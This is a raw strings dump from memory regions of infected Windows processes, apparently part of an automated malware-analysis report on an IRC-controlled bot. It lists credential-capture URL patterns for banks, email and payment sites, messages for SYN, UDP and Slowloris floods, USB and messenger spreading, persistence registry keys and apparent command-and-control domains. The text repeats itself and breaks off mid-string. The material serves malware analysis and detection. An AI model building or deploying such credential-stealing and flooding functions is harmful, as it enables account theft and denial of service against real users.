'%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\notepad.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\notepad.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre>jqs.exe_348_rwx_010C0000_0004E000:<pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%Program Files%\Java\jre6\bin\jqs.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\Program Files\Java\jre6\bin\jqs.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre>winlogon.exe_708_rwx_014A0000_0004E000:<pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0K</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG 